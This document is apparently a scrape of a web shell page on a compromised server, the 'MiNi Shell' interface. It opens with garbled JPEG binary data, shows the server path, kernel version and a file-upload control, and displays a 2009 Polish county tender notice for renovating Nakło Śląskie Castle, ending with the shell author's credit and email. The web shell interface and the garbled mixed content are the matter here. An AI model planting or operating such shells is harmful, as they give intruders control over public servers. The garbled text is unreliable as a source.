JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090302/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090302/45226-N-2009.html

<p class="kh_header"><b>Tarnowskie Góry: Opracowanie dokumentacji projektowej na remont i adaptację budynku Zamku wraz z zagospodarowaniem terenu zlokalizowanego w Nakle Śląskim ul. Parkowa 1 na potrzeby Centrum Kultury Śląskiej</b><br>
<b>Numer ogłoszenia: 45226 - 2009; data zamieszczenia: 02.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Tarnogórski , ul. Karłuszowiec 5, 42-600 Tarnowskie Góry, woj. śląskie, tel. 032 3813786, faks 032 3813727.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat.tarnogorski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji projektowej na remont i adaptację budynku Zamku wraz z zagospodarowaniem terenu zlokalizowanego w Nakle Śląskim ul. Parkowa 1 na potrzeby Centrum Kultury Śląskiej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest opracowanie dokumentacji projektowej remontu i adaptacji budynku Zamku oraz zagospodarowania terenu nieruchomości na potrzeby Centrum Kultury Śląskiej wraz z uzyskaniem decyzji o pozwoleniu na budowę dla realizacji przedsięwzięcia. Dokładny adres obiektu objętego postępowaniem: Zamek w Nakle Śląskim, ul. Parkowa 1, 42-620 Nakło Śląskie.
Całość obiektu - Zamek z założeniem parkowym w Nakle Śląskim, powiat Tarnowskie Góry został wpisany do rejestru zabytków dawnego województwa katowickiego na mocy decyzji Wojewódzkiego Konserwatora Zabytków w Katowicach z dnia 02.05.1966r. pod nr A/646/66 i z tego względu podlega szczególnej ochronie prawnej, wyrażającej się m.in. w konieczności uzyskania pozwolenia wojewódzkiego konserwatora zabytków na podejmowanie działań, które mogłyby prowadzić do naruszenia substancji lub zmiany wyglądu zabytku wpisanego do rejestru (art. 36 ust. 1 pkt. 11 ustawy o ochronie zabytków i opiece nad zabytkami z dnia 23.07.2003r. -  Dz. U. Nr 162, poz. 1568 z późniejszymi zmianami).
Zamówienie obejmuje wykonanie kompletnej dokumentacji projektowej dla przeprowadzenia remontu i adaptacji budynku Zamku 
oraz zagospodarowania jego otoczenia w granicach ogrodzenia na potrzeby utworzenia Centrum Kultury Śląskiej. Obiekt o wymiarach 18,81 m x 57,43 m, wysokość części głównej 17 m, wieży 37 m, posiada pięć kondygnacji w tym piwnica i poddasze. Pomieszczenia Zamku dla realizacji założonej funkcji planuje przeznaczyć się między innymi na prowadzenie działalności muzealnej, lokalizację galerii sztuki, utworzenie bazy edukacyjno - konferencyjnej z miejscami noclegowymi oraz działalności małej gastronomii.
Obiekt zlokalizowany na działkach gruntu nr ewidencyjny 40/12 (KW 46920) i nr ewidencyjny 13 (KW 58530). Powierzchnia przewidziana do objęcia planowanym opracowaniem zagospodarowania terenu wynosi około 7,0 ha. Obszar objęty opracowaniem wg mapki stanowiącej załącznik nr 7 do specyfikacji istotnych warunków zamówienia (SIWZ).
Przedmiot zamówienia ma być wykonany w oparciu o dokumentację przetargową oraz obowiązkowo wizję lokalną w miejscu zamierzenia projektowego. W razie stwierdzenia przez Wykonawcę, że dokumentacja przetargowa zawiera błędy lub braki winien on niezwłocznie powiadomić o tym fakcie Zamawiającego.
Dokumentacja projektowa ma obejmować:
a) Remont i adaptację budynku Zamku na potrzeby Centrum Kultury Śląskiej,
b) Zagospodarowanie terenu wraz z budową parkingów i dróg komunikacyjnych,
c) Budowę sieci kanalizacyjnej wraz z lokalną oczyszczalnią ścieków oraz przyłączy według potrzeb (wodociągowego, kanalizacyjnego, elektroenergetycznego, gazowego, itp.),
d) Oświetlenie terenu oraz zewnętrzne oświetlenie iluminacyjne obiektu Zamku,
e) Remont ogrodzenie terenu wraz z bramami wjazdowymi,
f) Inwentaryzację zieleni, określenie i wyznaczenie ewentualnej wycinki oraz zaprojektowanie nowego zadrzewienia i zakrzewienia (w razie konieczności) przy zachowaniu minimalnej ingerencji w istniejącą zieleń (na wszelkie działania konieczność uzyskania zgody i decyzji Wojewódzkiego Śląskiego Konserwatora Zabytków w Katowicach).
Projektowany remont i adaptacja mają umożliwiać dostęp osobom niepełnosprawnym do obiektu oraz pomieszczeń (sal edukacyjno-konferencyjnych, wystawowych, itp.).
Wykonawca jest zobowiązany do wykonania dokumentacji projektowej w oparciu o pisemne uzgodnienia z Zamawiającym, dotyczące:
a) koncepcji funkcjonalno-przestrzennej wykonanej na podstawie założeń programowych dla przeprowadzenia remontu i adaptacji budynku Zamku i zagospodarowania terenu (opisanych w pkt. I.2. SIWZ),
b) wytycznych do opracowania dokumentacji w związku z planowanymi robotami budowlanymi i adaptacyjnymi budynku Zamku w Nakle Śląskim (pismo Wojewódzkiego Urzędu Ochrony Zabytków w Katowicach z dnia 22.08.2007r. znak K-NR-RF/4161/4492/1/07 oraz pismo Śląskiego Wojewódzkiego Konserwatora Zabytków w Katowicach z dnia 26.03.2007r. znak K-NR-UP/4161/1164/4/07) stanowiących załącznik nr 8 do SIWZ,
c) standardów urządzeń,
d) standardów wykończenia budynków zabytkowych,
e) projektu budowlanego.
Szczegółowy opis przedmiotu zamówienia oraz wymagań przy realizacji zamówienia znajduje się w SIWZ..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości 7.350,00 PLN<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W przetargu mogą brać udział wykonawcy, którzy: 
1. nie podlegają wykluczeniu z art. 24 ust. 1 i ust 2 ustawy prawo zamówień publicznych.
2. spełniają warunki określone w art. 22 ust.1 ustawy prawo zamówień publicznych.
3. zrealizowali co najmniej trzy należycie wykonane usługi projektowe w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, o charakterze i złożoności porównywalnej z zakresem usług będących przedmiotem zamówienia dotyczących remontu obiektu zabytkowego niezależnie od przeznaczenia i pełnionej funkcji.
4. do wykonania zamówienia skierują osoby posiadające uprawnienia budowlane lub inne specjalistyczne do projektowania w specjalnościach:
a) architektonicznej,
b) konstrukcyjno-budowlanej,
c) drogowej,
d) instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych,
e) instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych,
f) systemu sygnalizacji pożaru w obiektach.
Ocena spełnienia wyżej wymienionych warunków dokonana będzie na podstawie oświadczeń i dokumentów, złożonych przez Wykonawcę wraz z ofertą, zgodnie z zasadą spełnia/nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Dla dokonania oceny spełnienia warunków wyszczególnionych wyżej Wykonawca przedstawi następujące dokumenty:
a) Wypełniony, podpisany i opieczętowany przez osobę upoważnioną (osoby upoważnione) do reprezentowania wykonawcy formularz ofertowy według wzoru stanowiącego załącznik nr 1 do specyfikacji istotnych warunków zamówienia (SIWZ).
b) Zaparafowane lub podpisane i opieczętowane przez osobę upoważnioną (osoby upoważnione) do reprezentowania Wykonawcy istotne postanowienia umowy stanowiące załącznik nr 2 do specyfikacji (SIWZ).
c) Aktualny lub uaktualniony odpis z właściwego rejestru lub zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
d) Stosowne pełnomocnictwo w przypadku gdy nie wynika ono z dokumentu dopuszczającego do obrotu lub umowy spółki cywilnej lub pełnomocnictwo dla lidera podmiotów występujących wspólnie.
e) Oświadczenie, iż spełnia warunki określone w art. 22 ust. 1 prawo zamówień publicznych i nie podlega wykluczeniu z art. 24 ust.1 i 2 w/w. Ustawy (załącznik nr 3 do SIWZ).
f) Umowę spółki cywilnej, jeśli działalność gospodarcza prowadzona jest w formie spółki cywilnej (umowa niezbędna jest w celu identyfikacji stron /wspólników spółki oraz zasad i sposobu reprezentacji spółki).
g) Wykaz, co najmniej trzech, wykonanych w ciągu ostatnich 3 lat usług projektowych, a jeśli okres prowadzenia działalności jest krótszy - w tym okresie, dotyczących remontu obiektów zabytkowych z podaniem ich wartości, daty wykonania, odbiorców i zakresu przedmiotu wraz  z załączeniem co najmniej trzech dokumentów potwierdzających, że usługi projektowe zostały wykonane z należytą starannością (wg załącznika nr 4 do SIWZ) celem sprawdzenia warunku, o którym mowa wyżej
h) Wykaz osób (w celu sprawdzenia warunku, o którym mowa wyżej), którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami (danymi) na temat ich kwalifikacji zawodowych, wykształcenia i doświadczenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności (wg załącznika nr 5 do SIWZ), ze szczególnym wskazaniem:
- kierownika prac projektowych (imię i nazwisko, kwalifikacje i uprawnienia niezbędne do wykonania zamówienia aktualny wpis do rejestru Inżynierów i Techników Izby Budownictwa, posiadane ubezpieczenie OC),
Jeżeli w wykazie Wykonawca wskaże osoby, którymi będzie dysponował, składa pisemne zobowiązanie podmiotów do udostępnienia osób zdolnych do wykonania zamówienia. Należy dołączyć dokumenty potwierdzające powyższe.
i) Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału ZUS/KRUS potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
j) Oświadczenie o podwykonawstwie (jeśli Wykonawca zamierza powierzyć wykonanie części zamówienia podwykonawcom, wg załącznika nr 6 do SIWZ).
k) Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, to zamiast dokumentów wyszczególnionych w punkcie c), i) winien przedstawić dokumenty, zgodnie z prawem kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji ani nie ogłoszono upadłości, oraz że nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne i zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu. Termin ważności dokumentów analogicznie jak w p. c) oraz i);
l) Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w punkcie k), zastępuje się je dokumentem zawierającym oświadczenie, złożone przed właściwym organem sądowym, administracyjnym, organem samorządu zawodowego lub gospodarczego, albo przed notariuszem odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.
Dokumenty i oświadczenia, o których mowa wyżej mają być aktualne lub uaktualnione przez organ je wydający, przedstawione w formie oryginałów lub kopii potwierdzonych za zgodność z oryginałem przez osoby upoważnione do reprezentowania wykonawcy za wyjątkiem dokumentu pełnomocnictwa, które ma być potwierdzone za zgodność z oryginałem przez notariusza lub mocodawcę. Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez Wykonawcę.
Brak dokumentów wymienionych wyżej spowoduje odrzucenie oferty z zastrzeżeniem art. 26 ust. 3 ustawy Prawo zamówień publicznych..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.tarnogorski.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wydział Organizacyjny Starostwa Powiatowego w Tarnowskich Górach, ul. Karłuszowiec 5 (pok. 101). Możliwość przesłania SIWZ pocztą, po otrzymaniu pisemnego wniosku o jej przekazanie.Siwz jest bezpłatna.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.03.2009 godzina 09:30, miejsce: Zamkniętą kopertę zawierającą ofertę należy złożyć w siedzibie Starostwa Powiatowego, 42-600 Tarnowskie Góry, ul. Karłuszowiec 5 (Kancelaria Starostwa, pok. 1)..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Kategoria usług: 12.Kod CPV: 71320000-7 Usługi inżynieryjne w zakresie projektowania.Termin rozpoczęcia prac ustala się na dzień zawarcia umowy.
Termin wykonania koncepcji funkcjonalno-przestrzennej i projektu budowlanego do 30.09.2009r.Termin zakończenia prac ustala się do 31.10.2009r.Termin zakończenia prac uwzględnia uzyskanie przez Wykonawcę:
a) wszelkich niezbędnych materiałów potrzebnych do opracowania dokumentacji tj. podkładów geodezyjnych, pozwoleń, opinii i uzgodnień,
b) pozwolenia na podejmowanie działań przy zabytku wpisanym do rejestru, na prowadzenie robót budowlanych przy zabytku wpisanym do rejestru i na wykonanie robót budowlanych w otoczeniu zabytku,
c) pozwolenia na budowę.
Osobami uprawnionymi do kontaktów z wykonawcami są:
- w kwestiach technicznych: Jan Ochman - podinspektor w Biurze ds. Inwestycji, tel. +48 32 381-37-80
- w kwestiach formalnych: Iwona Penkaty, główny specjalista w Wydziale Organizacyjnym, tel. +48 32 381-37-86.
Otwarcie ofert nastąpi w siedzibie Starostwa Powiatowego w Tarnowskich Górach, ul. Karłuszowiec 5 w dniu 18 marca 2009 roku  o godzinie 10:00.Ogłoszenie dotyczy zamówienia publicznego. Zamawiający nie ustanawia dynamicznego systemu zakupów.Zamawiający nie przewiduje zawarcia umowy ramowej. 
Rozliczenia między Zamawiającym a Wykonawcą będą prowadzone w złotych polskich. Zamawiający nie przewiduje zwrotu kosztów postępowania za wyjątkiem regulacji zawartych w art. 93, ust. 4 ustawy Prawo zamówień publicznych.

Creat By MiNi SheLL
Email: jattceo@gmail.com